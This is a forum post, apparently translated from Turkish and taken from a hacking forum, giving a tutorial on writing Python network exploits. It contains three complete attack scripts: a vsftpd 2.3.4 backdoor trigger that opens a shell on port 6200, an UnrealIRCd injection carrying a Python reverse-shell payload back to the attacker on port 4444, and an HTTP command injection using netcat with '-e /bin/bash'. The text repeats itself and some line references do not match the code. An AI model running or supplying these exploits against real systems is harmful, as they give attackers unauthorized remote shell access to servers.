- 21 Eki 2015
- 477
- 1
Hello again with a long topic.
Today I will try to explain how to write an internet-based exploit with python.
I will benefit from 3 different vulnerabilities that are shown as examples.
Lets move on if you want.
If we want to write an internet-based exploit, we need to know network programming first.
Socket module is used in network programming with Python.
Specific parameters on the socket.
With these parameters, a basic connection can be established and contacted.
These parameters will be sufficient for exploits to be written already at a very basic level.
Vsfpd 2.3.4
There are two main reasons why I chose the Vsfpd deficit:
1. The most examples are because the exploiting process takes place on itself.
2. There is no handler in the connection to be made.
The way to exploit the vulnerability is to open a shell on Port 6200 by bringing D as an escape parameter to the end of the answer given to the users username question.
The code I wrote for this operation is:
Socket and sys modules prepared for the first 2 parts of the scripts are called.
The link to be made in line 4 will be over TCP and Ipv4, and it gives a variable as aux in keeping the script short.
In the 5. And 6. Part, the desired host and port parameters will be determined from the user.
It is connected to the port with the IP address specified in line 9. Now all parameters with aux variables will perform operations on this connection.
In the 10., 11., and 17. Parts, the control of the connected port is done.
The first step of exploiting was to send the escape parameter with the data sent in the row 12.
The process is continuing by taking the package that will come in line 13.
In the 14. And 15. Lines, the last touch is made and the connection is exited.
When looking at the code with the new variable in the line 22, the variable is given as in line 4 in order to have a more understandable image.
If the connection is made in the 25. Line, a while loop is opened which will continue as long as there is no exit from it.
On the 26. Line, the data to be sent from the hacker is requested.
In the line 28, a quick exit process is described for convenience.
The data entered in line 32 is sent to the other party.
In response to the data sent on line 33, the answer is received and the line 26 is re-entered.
.:What our Hacker saw:.
.:What is happening in the network:.
Unreal IRC
I chose this vulnerability because it is an easy deficit, as well as deficit that we can use a handler for exploiting.
In order to exploit the deficit, after receiving the packages sent to us after the connection is completed, we can exploit the expected response from us with the AB; escape parameter and then write the code we want.
I wrote the following script for this process:
The same process as in the previous exploit was done in others.
Payload module is defined in the line to be sent after the connection is established. The module is written in python an its purpose is to connect to the hackers port 4444 with shell. In this first part of this AB; escape parameter appears.
Payload is being sent on line 12.
In the line 13, the answer package is received in order not to break servers heart, but it isnt presented to the hacker.
In the 18. Line, a listening port is opened in order to catch the shell connection to be received by the server.
The number of users to connect in line 19 is 1 device.
In the line 20, the connection to the previous payload is requested to be completed.
It is decided that the next user in the line 21 should be assigned to a variable named CL.
There is a while loop running if there is a connection on the line 23.
The rest is the same as the previous exploit.
.:What our Hacker saw:.
.:What does Wireshark see?:.
Command Injection
There are two reasons why I chose this deficit:
1. Because it is an deficit with an HTTP base and exploit is written accordingly.
2. There are so many vulnerabilities with HTTP and because they all look alike, I chose this vulnerability using my laziness.
The way to exploit the vulnerability is to request data from you in Command injection and run it on the command line to output it to you.
If you use the l parameters as the escape directory, then the command you type will work.
I wrote the following script to make this process:
The first parts do the same with other exploits again.
In line 9, we make an HTTP request to the HTTP port. It is in the command that will make command injection in the sent request. ( | nc [IP address] [port] -e /bin/bash)
Listening process is started in the lines 10-12 and the request containing the bypass code is sent.
The rest are the same as the other exploits.
.:What our Hacker saw:.
.:What does Wireshark see?:.
Thank you for reading the subject.
I definitely have a mistake, Im not an expert in Python.
I wish a good forum.
Source: https://www.turkhackteam.org/python/1727579-python-ile-exploit-yazmak.html
Today I will try to explain how to write an internet-based exploit with python.
I will benefit from 3 different vulnerabilities that are shown as examples.
Lets move on if you want.
If we want to write an internet-based exploit, we need to know network programming first.
Socket module is used in network programming with Python.
Specific parameters on the socket.
Kod:
socket.AF_INET : Yapılacak bağlantıyı IPv4 üzerinden yapmayı sağlar.
socket.AF_INET6 : Yapılacak bağlantıyı IPv6 üzerinden yapmayı sağlar.
socket.SOCK_STREAM : Yapılacak bağlantıda TCP protokolünün kullanılmasını sağlar.
socket.SOCK_DGRAM : Yapılacak bağlantıda UDP protokolünün kullanılmasını sağlar.
socket.connect((h,p)) : Belirtilen IP adresine bağlanır.(Kullanıcı)
socket.bind((h,p)) : Belirtilen IP ile portu dinlemeye alır.(Sunucu)
socket.listen() : Dinlemeye alınan adrese bağlanacak sayıyı kararlar.
socket.accept() : Bağlantı kurmak isteyen kişileri kabul eder.
socket.send() : Bağlantı kurulan kişiye veri yollanır.
socket.recv() : Bağlantıdan gelecek olan cevabı alır.With these parameters, a basic connection can be established and contacted.
These parameters will be sufficient for exploits to be written already at a very basic level.
Vsfpd 2.3.4
There are two main reasons why I chose the Vsfpd deficit:
1. The most examples are because the exploiting process takes place on itself.
2. There is no handler in the connection to be made.
The way to exploit the vulnerability is to open a shell on Port 6200 by bringing D as an escape parameter to the end of the answer given to the users username question.
The code I wrote for this operation is:
Kod:
01| from socket import *
02| import sys
03|
04| aux = socket(AF_INET,SOCK_STREAM)
05| host = sys.argv[1]
06| port = int(sys.argv[2])
07|
08|
09| aux.connect((host,port))
10| head = aux.recv(1024).strip()
11| if "(vsFTPd 2.3.4)" in head:
12| aux.send("USER something:)\n")
13| aux.recv(1024)
14| aux.send("PASS againsomething\n")
15| aux.close()
16| print "My man! This port has got a vull.\n"
17| else:
18| print "Sorry dude:( This is a normal port\n"
19| exit()
20|
21|
22| exp = socket(AF_INET,SOCK_STREAM)
23|
24| exp.connect((host,6200))
25| while True:
26| com = raw_input("#")
27| if com == "exit":
28| exp.close()
29| exit()
30| exp.send(com + "\n")
31| print exp.recv(1024)Socket and sys modules prepared for the first 2 parts of the scripts are called.
The link to be made in line 4 will be over TCP and Ipv4, and it gives a variable as aux in keeping the script short.
In the 5. And 6. Part, the desired host and port parameters will be determined from the user.
It is connected to the port with the IP address specified in line 9. Now all parameters with aux variables will perform operations on this connection.
In the 10., 11., and 17. Parts, the control of the connected port is done.
The first step of exploiting was to send the escape parameter with the data sent in the row 12.
The process is continuing by taking the package that will come in line 13.
In the 14. And 15. Lines, the last touch is made and the connection is exited.
When looking at the code with the new variable in the line 22, the variable is given as in line 4 in order to have a more understandable image.
If the connection is made in the 25. Line, a while loop is opened which will continue as long as there is no exit from it.
On the 26. Line, the data to be sent from the hacker is requested.
In the line 28, a quick exit process is described for convenience.
The data entered in line 32 is sent to the other party.
In response to the data sent on line 33, the answer is received and the line 26 is re-entered.
.:What our Hacker saw:.
.:What is happening in the network:.
Unreal IRC
I chose this vulnerability because it is an easy deficit, as well as deficit that we can use a handler for exploiting.
In order to exploit the deficit, after receiving the packages sent to us after the connection is completed, we can exploit the expected response from us with the AB; escape parameter and then write the code we want.
I wrote the following script for this process:
Kod:
01| from socket import *
02| import sys
03|
04| thost, tport = sys.argv[1], int(sys.argv[2])
05| lhost = '"'+ sys.argv[3] +'"'
06|
07|
08| fir = socket(AF_INET,SOCK_STREAM)
09|
10| fir.connect((thost,tport))
11| payload = """AB;python -c 'import socket,subprocess,os;pay=socket.socket(socket.AF_INET,socket.SOCK_STREAM);pay.connect((""" + lhost + """,4444));os.dup2(pay.fileno(),0); os.dup2(pay.fileno(),1); os.dup2(pay.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
12| fir.send(payload)
13| fir.recv(1024)
14|
15|
16| han = socket(AF_INET,SOCK_STREAM)
17|
18| han.bind(("",4444))
19| han.listen(1)
20| fir.close()
21| cl = han.accept()
22| print cl.recv(1024)
23| while True:
24| sh = cl.recv(1024)
25| send = raw_input(sh)
26| if send == "exit":
27| han.close()
28| exit()
29| cl.send(send + "\n")
30| data = cl.recv(1024)
31| print dataThe same process as in the previous exploit was done in others.
Payload module is defined in the line to be sent after the connection is established. The module is written in python an its purpose is to connect to the hackers port 4444 with shell. In this first part of this AB; escape parameter appears.
Payload is being sent on line 12.
In the line 13, the answer package is received in order not to break servers heart, but it isnt presented to the hacker.
In the 18. Line, a listening port is opened in order to catch the shell connection to be received by the server.
The number of users to connect in line 19 is 1 device.
In the line 20, the connection to the previous payload is requested to be completed.
It is decided that the next user in the line 21 should be assigned to a variable named CL.
There is a while loop running if there is a connection on the line 23.
The rest is the same as the previous exploit.
.:What our Hacker saw:.
.:What does Wireshark see?:.
Command Injection
There are two reasons why I chose this deficit:
1. Because it is an deficit with an HTTP base and exploit is written accordingly.
2. There are so many vulnerabilities with HTTP and because they all look alike, I chose this vulnerability using my laziness.
The way to exploit the vulnerability is to request data from you in Command injection and run it on the command line to output it to you.
If you use the l parameters as the escape directory, then the command you type will work.
I wrote the following script to make this process:
Kod:
01| from socket import *
02| import sys
03|
04| con = socket(AF_INET,SOCK_STREAM)
05| han = socket(AF_INET,SOCK_STREAM)
06| rhost, url, lhost = sys.argv[1], sys.argv[2], sys.argv[3]
07|
08| con.connect((rhost,80))
09| payload = "GET "+ url +"|%20nc%20"+ lhost +"%204444%20-e%20/bin/bash HTTP/1.1\nHost: "+ rhost +"\n\n"
10| han.bind(("",4444))
11| han.listen(1)
12| con.send(payload)
13|
14| cl = han.accept()
15| while True:
16| send = raw_input("==>")
17| cl.send(send + "\n")
18| data = cl.recv(1024)
19| print(data)The first parts do the same with other exploits again.
In line 9, we make an HTTP request to the HTTP port. It is in the command that will make command injection in the sent request. ( | nc [IP address] [port] -e /bin/bash)
Listening process is started in the lines 10-12 and the request containing the bypass code is sent.
The rest are the same as the other exploits.
.:What our Hacker saw:.
.:What does Wireshark see?:.
Thank you for reading the subject.
I definitely have a mistake, Im not an expert in Python.
I wish a good forum.
Source: https://www.turkhackteam.org/python/1727579-python-ile-exploit-yazmak.html
Translator: Provido
